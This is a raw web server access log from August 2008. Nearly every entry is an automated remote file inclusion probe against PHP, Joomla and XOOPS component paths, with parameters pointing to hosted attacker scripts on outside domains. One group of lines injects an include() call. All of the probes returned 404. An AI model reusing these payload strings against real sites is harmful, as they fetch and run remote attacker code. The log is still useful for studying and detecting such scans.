193.201.218.158 - - [16/Aug/2008:19:00:13 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
193.201.218.158 - - [16/Aug/2008:19:00:13 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
193.201.218.158 - - [16/Aug/2008:19:00:16 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
193.201.218.158 - - [16/Aug/2008:19:00:16 -0500] "GET /phphtml.php?htmlclass_path=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
193.227.113.225 - - [16/Aug/2008:19:01:01 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
193.227.113.225 - - [16/Aug/2008:19:01:01 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
66.199.250.122 - - [16/Aug/2008:19:01:05 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.811"
66.199.250.122 - - [16/Aug/2008:19:01:05 -0500] "GET /phphtml.php?htmlclass_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
66.199.250.122 - - [16/Aug/2008:19:01:06 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
212.150.247.23 - - [16/Aug/2008:19:02:06 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
212.150.247.23 - - [16/Aug/2008:19:02:06 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
193.201.218.158 - - [16/Aug/2008:19:03:07 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
193.201.218.158 - - [16/Aug/2008:19:03:10 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
193.227.113.225 - - [16/Aug/2008:19:03:33 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
193.227.113.225 - - [16/Aug/2008:19:03:34 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.76.116.20 - - [16/Aug/2008:19:03:42 -0500] "GET /logs/access_log.1209600000/admin/editeur/spaw_control.class.php?spaw_root=http://www.tvdudenhofen-handball.de/aaaaaaaaaaaaaa/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
89.248.110.152 - - [16/Aug/2008:19:04:16 -0500] "GET /logs/access_log.1214524800/modules/agendax/addevent.inc.php?agendax_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
89.248.110.152 - - [16/Aug/2008:19:04:16 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
89.248.110.152 - - [16/Aug/2008:19:04:17 -0500] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:19:04:49 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.61 (Macintosh; I; PPC)"
212.150.247.23 - - [16/Aug/2008:19:04:49 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.61 (Macintosh; I; PPC)"
91.186.15.66 - - [16/Aug/2008:19:05:08 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
189.70.11.137 - - [16/Aug/2008:19:06:27 -0500] "GET //index.php?DOCUMENT_ROOT=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.0" 404 282 "-""libwww-perl/5.79"
189.70.11.137 - - [16/Aug/2008:19:06:27 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.0" 404 287 "-""libwww-perl/5.79"
89.248.110.152 - - [16/Aug/2008:19:07:08 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:19:07:47 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
212.150.247.23 - - [16/Aug/2008:19:07:47 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
66.199.250.122 - - [16/Aug/2008:19:09:25 -0500] "GET /logs/access_log.1214438400/modules/agendax/addevent.inc.php?agendax_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
65.55.208.132 - - [16/Aug/2008:19:09:47 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [16/Aug/2008:19:09:48 -0500] "GET /artwork/toys.htm HTTP/1.1" 200 1337 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
212.150.247.23 - - [16/Aug/2008:19:10:35 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
212.150.247.23 - - [16/Aug/2008:19:10:35 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
193.201.218.158 - - [16/Aug/2008:19:12:29 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
193.201.218.158 - - [16/Aug/2008:19:12:32 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
208.116.39.133 - - [16/Aug/2008:19:12:59 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.bangin-bros.de/picturesolution_211/install/id.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
208.116.39.133 - - [16/Aug/2008:19:12:59 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.bangin-bros.de/picturesolution_211/install/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
81.26.215.28 - - [16/Aug/2008:19:13:04 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
212.150.247.23 - - [16/Aug/2008:19:13:23 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
212.150.247.23 - - [16/Aug/2008:19:13:23 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
216.246.8.237 - - [16/Aug/2008:19:13:28 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
216.246.8.237 - - [16/Aug/2008:19:13:28 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
74.55.113.226 - - [16/Aug/2008:19:14:38 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
64.22.89.194 - - [16/Aug/2008:19:14:54 -0500] "GET /logs/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:19:14:54 -0500] "GET /logs/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:19:14:54 -0500] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:19:14:54 -0500] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.812"
72.52.212.40 - - [16/Aug/2008:19:14:55 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
72.52.212.40 - - [16/Aug/2008:19:14:55 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
212.150.247.23 - - [16/Aug/2008:19:15:58 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
212.150.247.23 - - [16/Aug/2008:19:15:58 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
129.142.67.13 - - [16/Aug/2008:19:16:57 -0500] "GET /logs/access_log.1214179200//vwar/g4//convert/mvcw.php?step=1&vwar_root=http://warsector.ru/access2006.log??? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
195.218.170.130 - - [16/Aug/2008:19:16:59 -0500] "GET /logs/access_log.1213488000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
195.218.170.130 - - [16/Aug/2008:19:17:04 -0500] "GET /logs/access_log.1213488000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
195.218.170.130 - - [16/Aug/2008:19:17:13 -0500] "GET /logs/access_log.1199750400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
195.218.170.130 - - [16/Aug/2008:19:17:17 -0500] "GET /logs/access_log.1199750400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
89.248.110.152 - - [16/Aug/2008:19:17:32 -0500] "GET /logs/access_log.1214179200/phphtml.php?htmlclass_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:19:18:29 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
212.150.247.23 - - [16/Aug/2008:19:18:29 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
72.29.70.187 - - [16/Aug/2008:19:19:10 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 344 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
72.29.70.187 - - [16/Aug/2008:19:19:10 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 349 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
62.87.154.41 - - [16/Aug/2008:19:20:51 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
62.87.154.41 - - [16/Aug/2008:19:20:51 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
65.111.166.193 - - [16/Aug/2008:19:20:55 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
87.230.21.231 - - [16/Aug/2008:19:21:19 -0500] "GET /logs/access_log.1213488000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
212.150.247.23 - - [16/Aug/2008:19:21:26 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
212.150.247.23 - - [16/Aug/2008:19:21:26 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
87.230.21.231 - - [16/Aug/2008:19:21:30 -0500] "GET /logs/access_log.1199750400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
62.87.154.41 - - [16/Aug/2008:19:21:33 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
62.87.154.41 - - [16/Aug/2008:19:21:33 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
62.144.33.204 - - [16/Aug/2008:19:21:46 -0500] "GET /logs//myMailer.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
62.144.33.204 - - [16/Aug/2008:19:21:47 -0500] "GET //myMailer.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
193.200.173.5 - - [16/Aug/2008:19:22:54 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wo.passandgo.org/images/.../id2.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
193.200.173.5 - - [16/Aug/2008:19:22:54 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wo.passandgo.org/images/.../id2.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
139.146.145.67 - - [16/Aug/2008:19:23:03 -0500] "GET /logs/access_log.1213488000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
77.240.226.168 - - [16/Aug/2008:19:23:14 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bmwccth.com/webboard/Packages/osid6.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
77.240.226.168 - - [16/Aug/2008:19:23:14 -0500] "GET /logs/access_log.1216598400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bmwccth.com/webboard/Packages/osid6.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
77.240.226.168 - - [16/Aug/2008:19:23:14 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bmwccth.com/webboard/Packages/osid6.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
64.22.89.194 - - [16/Aug/2008:19:23:46 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:19:23:47 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:19:23:48 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:19:23:48 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
62.144.33.204 - - [16/Aug/2008:19:23:53 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
62.144.33.204 - - [16/Aug/2008:19:23:53 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
139.146.145.67 - - [16/Aug/2008:19:24:11 -0500] "GET /logs/access_log.1199750400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
212.150.247.23 - - [16/Aug/2008:19:24:25 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
212.150.247.23 - - [16/Aug/2008:19:24:25 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
74.6.22.107 - - [16/Aug/2008:19:24:33 -0500] "GET /logs/access_log.1216252800 HTTP/1.0" 200 569597 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
202.181.210.195 - - [16/Aug/2008:19:26:47 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/readme.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
202.181.210.195 - - [16/Aug/2008:19:26:49 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/readme.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
66.199.250.122 - - [16/Aug/2008:19:27:06 -0500] "GET /logs/access_log.1214179200/modules/agendax/addevent.inc.php?agendax_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
212.150.247.23 - - [16/Aug/2008:19:27:09 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
212.150.247.23 - - [16/Aug/2008:19:27:09 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
74.6.22.107 - - [16/Aug/2008:19:28:03 -0500] "GET /logs/access_log.1215302400 HTTP/1.0" 200 575317 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.208.43.121 - - [16/Aug/2008:19:29:38 -0500] "GET //parse/parser.php?WN_BASEDIR=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 301 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
89.208.43.121 - - [16/Aug/2008:19:29:38 -0500] "GET /logs//parse/parser.php?WN_BASEDIR=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 306 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
212.150.247.23 - - [16/Aug/2008:19:29:54 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
212.150.247.23 - - [16/Aug/2008:19:29:54 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
193.200.173.5 - - [16/Aug/2008:19:31:21 -0500] "GET /logs/access_log.1214179200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wo.passandgo.org/images/.../id2.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
193.200.173.5 - - [16/Aug/2008:19:31:22 -0500] "GET /logs/access_log.1214524800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wo.passandgo.org/images/.../id2.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
195.13.58.250 - - [16/Aug/2008:19:32:12 -0500] "GET /logs/access_log.1208044800/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
195.13.58.250 - - [16/Aug/2008:19:32:13 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
195.13.58.250 - - [16/Aug/2008:19:32:13 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
74.6.22.107 - - [16/Aug/2008:19:32:42 -0500] "GET /?M=A HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.13.58.250 - - [16/Aug/2008:19:33:02 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
213.133.104.18 - - [16/Aug/2008:19:33:10 -0500] "GET /logs/access_log.1208044800/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 365 "-""libwww-perl/5.808"
213.133.104.18 - - [16/Aug/2008:19:33:10 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 338 "-""libwww-perl/5.808"
213.133.104.18 - - [16/Aug/2008:19:33:11 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
89.208.43.121 - - [16/Aug/2008:19:33:20 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:33:21 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:33:21 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:33:21 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:19:33:52 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
212.150.247.23 - - [16/Aug/2008:19:33:52 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
195.13.58.250 - - [16/Aug/2008:19:34:28 -0500] "GET /logs/access_log.1208044800/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
195.13.58.250 - - [16/Aug/2008:19:34:29 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
195.13.58.250 - - [16/Aug/2008:19:34:29 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
74.6.22.107 - - [16/Aug/2008:19:35:17 -0500] "GET /?S=A HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.208.43.121 - - [16/Aug/2008:19:35:41 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:35:41 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
